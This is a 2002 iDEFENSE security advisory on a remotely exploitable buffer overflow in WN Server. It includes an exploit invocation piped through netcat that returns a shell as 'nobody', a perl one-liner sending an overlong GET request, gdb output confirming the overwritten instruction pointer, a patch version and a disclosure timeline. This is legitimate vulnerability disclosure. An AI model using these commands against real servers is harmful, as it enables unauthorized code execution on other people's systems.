Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
From: David Endler (dendler_at_idefense.com)
Date: Mon Sep 30 2002 - 09:09:59 CDT
-----BEGIN PGP SIGNED MESSAGE-----
iDEFENSE Security Advisory 09.30.2002
Buffer Overflow in WN Server
Versions 1.18.2 through 2.0.0 of John Franks’ WN Server application
are suceptible to remote exploition of a buffer overflow that an
attacker could cause arbitrary code execution under the privileges of
the targeted server. Exploitation is possible by issuing WN Server a
long GET request. In order to successfully exploit this
vulnerability, customized shell code is required to bypass the
character filtering that WN Server imposes on the requested URI.
"WN is a Web server which runs on a wide variety of UNIX platforms
and is freely available at no cost for any use under the terms of the
GNU General Public License." It is included in the latest FreeBSD
ports collection as well.
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
has assigned the identification number CAN-2002-1166 to this issue.
The following is a snapshot of an exploit at
$ (./wn_bof 0 3; cat) | nc target 80
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
Exploitation of a buffer overflow usually results in one of two
things: the targeted host process/application/host crashes, or
arbitrary code executes. Both have serious repercussions, but in most
cases code execution is more threatening in that it could allow for
the further usurpation of higher-level privileges on the targeted
wn-1.18.2 - wn-2.0.0, which is included in the current version of the
FreeBSD Project’s FreeBSD ports collection, is vulnerable. Take the
following steps to determine whether a specific WN implementation is
1. Ensure that WN is running and open two terminals.
2. In the first terminal execute:
$ (perl -e 'print "GET /" . "a"x1600';cat)|nc localhost 80
3. In the second terminal, determine the process ID of the child that
was spawned to handle the previous command, and attach GDB to it:
# ps ax | grep swn
4223 ?? Ss 0:00.29 ./swn
4711 ?? S 0:00.01 ./swn
# gdb ./swn 4711
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
4. In the second terminal, type 'c' telling GDB to continue.
5. In the first terminal, press enter. If at this point the following
output is returned from GDB, then a vulnerable WN implementation is
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
WN Server 2.4.4 is available at
http://hopf.math.nwu.edu/wn-2.4.4.tar.gz. Users should strongly
consider deploying the latest version.
8/29/2002 Disclosed to iDEFENSE
9/24/2002 Disclosed to vendor John Franks
9/24/2002 Dislcosed to iDEFNESE Clients
9/25/2002 Vendor Response
9/30/2002 Public Disclosure
This issue was exlcusively disclosed to iDEFENSE by badc0ded
Get paid for security research
David Endler, CISSP
Director, Technical Intelligence
14151 Newbrook Drive
Chantilly, VA 20151
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
-----END PGP SIGNATURE-----